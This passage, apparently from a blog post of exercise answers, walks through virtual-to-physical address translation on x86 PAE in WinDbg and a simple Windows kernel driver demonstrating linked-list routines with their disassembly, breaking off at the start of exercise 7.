<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><b>5) </b></span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">The </span><span style="font-family: Verdana, sans-serif;">address I choose to translate: f897a000 (it's the base address of a driver). </span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;">lkd> db f897a000</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;">f897a000 4d 5a 90 00 03 00 00 00-04 00 00 00 ff ff 00 00 MZ..............</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;">f897a010 b8 00 00 00 00 00 00 00-40 00 00 00 00 00 00 00 ........@.......</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;">f897a020 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;">f897a030 00 00 00 00 00 00 00 00-00 00 00 00 e0 00 00 00 ................</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;">f897a040 0e 1f ba 0e 00 b4 09 cd-21 b8 01 4c cd 21 54 68 ........!..L.!Th</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;">f897a050 69 73 20 70 72 6f 67 72-61 6d 20 63 61 6e 6e 6f is program canno</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;">f897a060 74 20 62 65 20 72 75 6e-20 69 6e 20 44 4f 53 20 t be run in DOS </span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;">f897a070 6d 6f 64 65 2e 0d 0d 0a-24 00 00 00 00 00 00 00 mode....$.......</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">This address corresponds to a 4K page in a </span><span style="font-family: Verdana, sans-serif;">x86 system with PAE enabled. I break down the virtual address in its components according to the Intel's documentation:</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;">f897a000 hex</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;">11111000100101111010000000000000 bin</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;">11 111000100 101111010 000000000000 (broken out)</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;">PDPE PDE PTE Offset</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;">2bit 9 bits 9 bits 12 bits</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"> 3 1c4h 452d 17ah 378d 0</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">Next, I need a page directory in order to perform the translation. Since the address I chose is a kernelmode one, I can get the page directory from any process: in this case I used </span><span style="font-family: Verdana, sans-serif;">the one from "alg.exe". I get it </span><span style="font-family: Verdana, sans-serif;">by listing all the processes with:</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;">!process 0 0</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;">...</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"><b>PROCESS 820a8240</b> SessionId: 0 Cid: 04e4 Peb: 7ffde000 ParentCid: 029c</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"> <b>DirBase: 081002e0</b> ObjectTable: e1f36ae0 HandleCount: 105.</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"> Image: alg.exe</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;">...</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">I can double check it in the related EPROCESS structure, the page directory is stored in the DirectoryTableBase member:</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;">lkd> dt -b nt!_EPROCESS 820a8240 </span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"> +0x000 Pcb : _KPROCESS</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"> +0x000 Header : _DISPATCHER_HEADER</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"> +0x000 Type : 0x3 ''</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"> +0x001 Absolute : 0 ''</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"> +0x002 Size : 0x1b ''</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"> +0x003 Inserted : 0 ''</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"> +0x004 SignalState : 0n0</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"> +0x008 WaitListHead : _LIST_ENTRY [ 0x81a97398 - 0x81a97398 ]</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"> +0x000 Flink : 0x81a97398 </span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"> +0x004 Blink : 0x81a97398 </span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"> +0x010 ProfileListHead : _LIST_ENTRY [ 0x820a8250 - 0x820a8250 ]</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"> +0x000 Flink : 0x820a8250 </span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"> +0x004 Blink : 0x820a8250 </span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"> +0x018 <b>DirectoryTableBase</b> : </span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"> [00] <b>0x81002e0</b></span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"> [01] 0xf454</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"> +0x020 LdtDescriptor : _KGDTENTRY</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">The first step consists in retrieving the address of the page directory from the PDPE array.</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">PDPE entry number 3: 81002e0 + 3*8 = 81002F8</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;">lkd> !dc 081002e0 </span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"># 81002e0 0f691001 00000000 0f452001 00000000 ..i...... E.....</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"># 81002f0 0f693001 00000000 <b>0f610001</b> 00000000 .0i.......a.....</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"># 8100300 133db001 00000000 1ea1c001 00000000 ..=.............</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">The value I am looking for is 0f610001. The lower 12 bits are used to store flags and other information, thus they can be ignored and set to zero to obtain the page address, which is </span><span style="font-family: Verdana, sans-serif;">0f610000.</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">In the second step, I locate the address of the page table from the page directory.</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">PDE entry number 1C4: 0f610000 + 1c4*8 = F610E20.</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;">lkd> !dc F610E20</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"># f610e20 <b>01032163</b> 00000000 01033163 00000000 c!......c1......</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"># f610e30 01034163 00000000 01035163 00000000 cA......cQ......</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">I obtain the value 01032163, from which I zero out the lower 12 bits to obtain the page address </span><span style="font-family: Verdana, sans-serif;">01032000.</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">The third step gives me the address of the the memory page from the page table.</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">PTE entry number 17a: 01032000 + 17a*8 = 1032BD0.</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;">lkd> !dc 1032BD0</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"># 1032bd0 <b>0437b163</b> 00000000 0437c121 00000000 c.7.....!.7.....</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"># 1032be0 0437d121 00000000 0437e163 00000000 !.7.....c.7.....</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">The value is 0437b163, that is </span><span style="font-family: Verdana, sans-serif;">0437b000 when the lower 12 bits are zeroed. This is the physical address of the memory page.</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">In the final step I add the "offset" part of the virtual address to the address I just obtained in step 3 in order to have the final physical address of the data I'm looking for. In this case, the offset is zero, thus the address remains 0437b000. I can verify that it is correct by visualizing the data pointed by the physical address:</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;">lkd> !dc 0437b000</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"># 437b000 00905a4d 00000003 00000004 0000ffff MZ..............</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"># 437b010 000000b8 00000000 00000040 00000000 ........@.......</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"># 437b020 00000000 00000000 00000000 00000000 ................</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"># 437b030 00000000 00000000 00000000 000000e0 ................</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"># 437b040 0eba1f0e cd09b400 4c01b821 685421cd ........!..L.!Th</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"># 437b050 70207369 72676f72 63206d61 6f6e6e61 is program canno</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"># 437b060 65622074 6e757220 206e6920 20534f44 t be run in DOS </span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"># 437b070 65646f6d 0a0d0d2e 00000024 00000000 mode....$.......</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">This is the same data that I saw earlier visualizing the virtual address </span><span style="font-family: Verdana, sans-serif;">f897a000. A further verification can be done </span><span style="font-family: Verdana, sans-serif;">with vtop:</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;">lkd> !vtop 0 f897a000</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;">X86VtoP: Virt f897a000, pagedir 8100320</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;">X86VtoP: PAE PDPE 8100338 - 000000001cd53001</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;">X86VtoP: PAE PDE 1cd53e20 - 0000000001032163</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;">X86VtoP: PAE PTE 1032bd0 - 000000000437b163</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;">X86VtoP: PAE Mapped phys <b>437b000</b></span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;">Virtual address f897a000 translates to physical address 437b000.</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">My system also supports big 2Mb pages, thus I decided to perform the same virtual-to-physical translation on a 2Mb page. The operating system uses big pages for the kernel, the hal and the non-paged pool, hence I chose the address of the NtCreateFile api that is located inside the kernel (therefore inside a 2Mb page).</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">The address to translate is: 8056d14c (NtCreateFile)</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">Similarly to the previous translation, I start by identifying the components of the virtual address:</span></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;">8056d14c hex</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;">10000000010101101101000101001100 bin</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"> 10 000000010 101101101000101001100 (broken out)</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;">PDPE PDE Offset</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;">2 bits 9 bits 21 bits</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"> 2 2 16D14Ch</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">The only difference is that this time the translation is one passage shorter (the PTE disappears). Again, I use the page directory from the "alg.exe" process.</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">I start by extracting the page directory.</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">PDPE entry number 2: 081002e0 + 2*8 = 81002f0</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;">lkd> !dc 81002f0</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"># 81002f0 <b>0f693001</b> 00000000 0f610001 00000000 .0i.......a.....</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"># 8100300 133db001 00000000 1ea1c001 00000000 ..=.............</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">I obtain the address 0f693000, which I use to retrieve the physical address of the memory page:</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">PDE entry number 2: 0f693000 + 2*8 = 0f693010</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;">lkd> !dc 0f693010</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"># f693010 <b>004001e3</b> 00000000 006001e3 00000000 ..@.......`.....</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"># f693020 00b08163 00000000 00b09163 00000000 c.......c.......</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">And I end up with 00400000, to which I need to add the offset:</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;">Offset 16D14Ch: 00400000 + 16D14C = <b>56d14c</b></span></div>
<div style="text-align: justify;">
<span style="font-family: 'Courier New', Courier, monospace;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">I can assess the correctness of the physical address by verifying that the data I see reading the virtual address is the same I see reading the physical address:</span></div>
<div style="text-align: justify;">
<span style="font-family: 'Courier New', Courier, monospace;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: 'Courier New', Courier, monospace;">lkd> !dc 56d14c</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"># 56d14c 8b55ff8b 50c033ec 75ff5050 2c75ff30 ..U..3.PPP.u0.u,</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"># 56d15c ff2875ff 75ff2475 1c75ff20 ff1875ff .u(.u$.u .u..u..</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;">lkd> db 8056d14c </span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;">8056d14c 8b ff 55 8b ec 33 c0 50-50 50 ff 75 30 ff 75 2c ..U..3.PPP.u0.u,</span></div>
<div style="text-align: justify;">
</div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;">8056d15c ff 75 28 ff 75 24 ff 75-20 ff 75 1c ff 75 18 ff .u(.u$.u .u..u..</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><b><br /></b></span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><b>6)</b></span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">The following code performs various operations on a list.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<pre style="background-image: URL(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0RLiAlfLucI_qoHJvHaLwvgXby8Z5TK-aqUneDA06kscMW-ILm4a94iJq4qsFWJQEUtkkWWtnA6woWdwoPT2LE4DB2URdsSOOa3-smdrFFQB1oG2jam0NLQaJYk7Z95MyTJNdoHSDytEn/s320/codebg.gif); background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;"> #include <ntddk.h>
#include <string.h>
DRIVER_INITIALIZE DriverEntry;
typedef struct _mydata
{
int a;
char *s;
LIST_ENTRY mylist;
} mydata;
#ifdef ALLOC_PRAGMA
#pragma alloc_text( INIT, DriverEntry )
#endif
VOID MyUnload(
__in PDRIVER_OBJECT DriverObject
)
{
DbgPrint("Unload routine\n");
}
NTSTATUS
DriverEntry(
__in PDRIVER_OBJECT DriverObject,
__in PUNICODE_STRING RegistryPath
)
{
mydata data;
LIST_ENTRY myhead;
mydata data1, data2, data3;
LIST_ENTRY *plist;
int i = 0;
DriverObject->DriverUnload = &MyUnload;
data1.a = 1;
data1.s = "string one";
data2.a = 2;
data2.s = "string two";
data3.a = 3;
data3.s = "string three";
InitializeListHead(&myhead);
InsertHeadList(&myhead, &(data1.mylist));
InsertTailList(&myhead, &(data2.mylist));
InsertTailList(&myhead, &(data3.mylist));
if(IsListEmpty(&myhead))
{
DbgPrint("List is empty after initialization\n");
}
else
{
DbgPrint("List is not empty after initialization\n");
}
plist = myhead.Flink;
while(plist != &myhead)
{
if(i++ >20)
{
break;
}
DbgPrint("entry: %d ", (CONTAINING_RECORD(plist, mydata, mylist))->a );
DbgPrint("string: %s \n", (CONTAINING_RECORD(plist, mydata, mylist))->s );
plist = plist->Flink;
}
RemoveEntryList(&(data2.mylist));
RemoveHeadList(&myhead);
RemoveTailList(&myhead);
if(IsListEmpty(&myhead))
{
DbgPrint("List is empty at the end of DriverEntry\n");
}
else
{
DbgPrint("List is not empty at the end of DriverEntry\n");
}
return STATUS_SUCCESS;
}
</code></pre>
<span style="font-family: Verdana, sans-serif;"><br /></span><span style="font-family: Verdana, sans-serif;">This is an example of the output it produces:</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">List is not empty after initialization</span><br />
<span style="font-family: Courier New, Courier, monospace;">entry: 1 string: string one </span><br />
<span style="font-family: Courier New, Courier, monospace;">entry: 2 string: string two </span><br />
<span style="font-family: Courier New, Courier, monospace;">entry: 3 string: string three </span><br />
<span style="font-family: Courier New, Courier, monospace;">List is empty at the end of DriverEntry</span><br />
<span style="font-family: Courier New, Courier, monospace;">Unload routine</span><br />
<br />
<span style="font-family: Verdana, sans-serif;">I identified the following inline functions in the decompiled code:</span><br />
<br />
<span style="font-family: Verdana, sans-serif;"><i>InitializeListHead(&myhead)</i></span><br />
<span style="font-family: Verdana, sans-serif;"><i>InsertHeadList(&myhead, &(data1.mylist))</i></span><br />
<i><span style="font-family: Verdana, sans-serif;">InsertTailList(&myhead, &(data2.mylist))</span></i><br />
<i style="font-family: Verdana, sans-serif;">InsertTailList(&myhead, &(data3.mylist))</i><span style="font-family: Verdana, sans-serif;"><i><br /></i></span>
<i style="font-family: Verdana, sans-serif;"><br /></i>
<br />
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">(because of compiler optimizations, these routines have been "merged" to eliminate unnecessary instructions, thus the boundaries of each routine are not very well defined any more)</span></div>
<span style="font-family: 'Courier New', Courier, monospace;"><br /></span>
<span style="font-family: 'Courier New', Courier, monospace;">lea rax, [r11-78h]</span><br />
<span style="font-family: Courier New, Courier, monospace;">mov [r11-30h], rax ; copy &</span><span style="font-family: 'Courier New', Courier, monospace;">myhead.mylist</span><span style="font-family: Courier New, Courier, monospace;"> in </span><span style="font-family: 'Courier New', Courier, monospace;">data1</span><span style="font-family: Courier New, Courier, monospace;">->Blink</span><br />
<span style="font-family: Courier New, Courier, monospace;">lea rax, [r11-38h]</span><br />
<span style="font-family: Courier New, Courier, monospace;">mov [r11-78h], rax ; copy &</span><span style="font-family: 'Courier New', Courier, monospace;">data1</span><span style="font-family: 'Courier New', Courier, monospace;">.mylist</span><span style="font-family: Courier New, Courier, monospace;"> in </span><span style="font-family: 'Courier New', Courier, monospace;">myhead</span><span style="font-family: Courier New, Courier, monospace;">->Flink</span><span class="Apple-tab-span" style="font-family: 'Courier New', Courier, monospace; white-space: pre;"> </span><span style="font-family: 'Courier New', Courier, monospace;"> </span><br />
<span style="font-family: Courier New, Courier, monospace;">lea rax, [r11-38h]</span><br />
<span style="font-family: Courier New, Courier, monospace;">mov [r11-50h], rax ; copy &</span><span style="font-family: 'Courier New', Courier, monospace;">data1</span><span style="font-family: 'Courier New', Courier, monospace;">.mylist</span><span style="font-family: Courier New, Courier, monospace;"> in </span><span style="font-family: 'Courier New', Courier, monospace;">data2</span><span style="font-family: Courier New, Courier, monospace;">->Blink</span><br />
<span style="font-family: Courier New, Courier, monospace;">lea rax, [r11-58h]</span><br />
<span style="font-family: Courier New, Courier, monospace;">mov [r11-38h], rax ; copy &</span><span style="font-family: 'Courier New', Courier, monospace;">data2</span><span style="font-family: 'Courier New', Courier, monospace;">.mylist</span><span style="font-family: Courier New, Courier, monospace;"> in </span><span style="font-family: 'Courier New', Courier, monospace;">data1</span><span style="font-family: Courier New, Courier, monospace;">->Flink</span><span class="Apple-tab-span" style="font-family: 'Courier New', Courier, monospace; white-space: pre;"> </span><span style="font-family: 'Courier New', Courier, monospace;"> </span><br />
<span style="font-family: Courier New, Courier, monospace;">lea rax, [r11-78h]</span><br />
<span style="font-family: Courier New, Courier, monospace;">mov [r11-18h], rax ; copy &</span><span style="font-family: 'Courier New', Courier, monospace;">myhead</span><span style="font-family: 'Courier New', Courier, monospace;">.mylist</span><span style="font-family: Courier New, Courier, monospace;"> in </span><span style="font-family: 'Courier New', Courier, monospace;">data3</span><span style="font-family: Courier New, Courier, monospace;">->Flink</span><br />
<span style="font-family: Courier New, Courier, monospace;">lea rax, [r11-58h]</span><br />
<span style="font-family: Courier New, Courier, monospace;">mov [r11-10h], rax ; copy &</span><span style="font-family: 'Courier New', Courier, monospace;">data2</span><span style="font-family: 'Courier New', Courier, monospace;">.mylist</span><span style="font-family: Courier New, Courier, monospace;"> in </span><span style="font-family: 'Courier New', Courier, monospace;">data3</span><span style="font-family: Courier New, Courier, monospace;">->Blink</span><br />
<span style="font-family: Courier New, Courier, monospace;">lea rax, [r11-18h]</span><br />
<span style="font-family: Courier New, Courier, monospace;">mov [r11-58h], rax ; copy &</span><span style="font-family: 'Courier New', Courier, monospace;">data3</span><span style="font-family: 'Courier New', Courier, monospace;">.mylist</span><span style="font-family: Courier New, Courier, monospace;"> in </span><span style="font-family: 'Courier New', Courier, monospace;">data2</span><span style="font-family: Courier New, Courier, monospace;">->Flink</span><br />
<span style="font-family: Courier New, Courier, monospace;">lea rax, [r11-18h]</span><br />
<span style="font-family: Courier New, Courier, monospace;">mov [r11-70h], rax ; copy &</span><span style="font-family: 'Courier New', Courier, monospace;">data3</span><span style="font-family: 'Courier New', Courier, monospace;">.mylist</span><span style="font-family: Courier New, Courier, monospace;"> in </span><span style="font-family: 'Courier New', Courier, monospace;">myhead</span><span style="font-family: Courier New, Courier, monospace;">->Blink</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><i>RemoveEntryList</i></span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">mov rax, [rsp+48h] <span class="Apple-tab-span" style="white-space: pre;"> </span> </span><br />
<span style="font-family: Courier New, Courier, monospace;">mov rcx, [rsp+40h] </span><br />
<span style="font-family: Courier New, Courier, monospace;">mov [rax], rcx</span><br />
<span style="font-family: Courier New, Courier, monospace;">mov [rcx+8], rax</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><i>RemoveHeadList</i></span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">mov rax, [rsp+98h+var_78]</span><br />
<span style="font-family: Courier New, Courier, monospace;">mov rcx, [rax]</span><br />
<span style="font-family: Courier New, Courier, monospace;">lea rax, [rsp+98h+var_78]</span><br />
<span style="font-family: Courier New, Courier, monospace;">mov [rsp+98h+var_78], rcx</span><br />
<span style="font-family: Courier New, Courier, monospace;">mov [rcx+8], rax</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><i>RemoveTailList</i></span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">mov rax, [rsp+98h+var_70]</span><br />
<span style="font-family: Courier New, Courier, monospace;">mov rcx, [rax+8]</span><br />
<span style="font-family: Courier New, Courier, monospace;">lea rax, [rsp+98h+var_78]</span><br />
<span style="font-family: Courier New, Courier, monospace;">mov [rsp+98h+var_70], rcx</span><br />
<span style="font-family: Courier New, Courier, monospace;">mov [rcx], rax</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><i>IsListEmpty</i></span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">lea rax, [rsp+98h+var_78]</span><br />
<span style="font-family: Courier New, Courier, monospace;">...</span><br />
<span style="font-family: Courier New, Courier, monospace;">cmp [rsp+98h+var_78], rax</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<br />
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">It is possible to see a pattern in these routines: since the operations they perform is always the same, the logic of the computation of the assembly instructions will be the same too. However, when the routines are compiled, their instructions may use different operands (e.g. registers, stack variables or global offsets). The instructions' order may differ as well, they may be interleaved with instructions from other computations, or the compiler optimizations may merge some of them. In conclusion, although the "logical" pattern of a single routine is pretty much constant, its assembly implementation may have many variations that make the task of recognizing patterns quite complicated.</span></div>
<br />
<span style="font-family: Verdana, sans-serif;"></span>
<br />
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><b>7)</b></span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">The following code illustrates an example of use of tables/trees and bitmaps.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
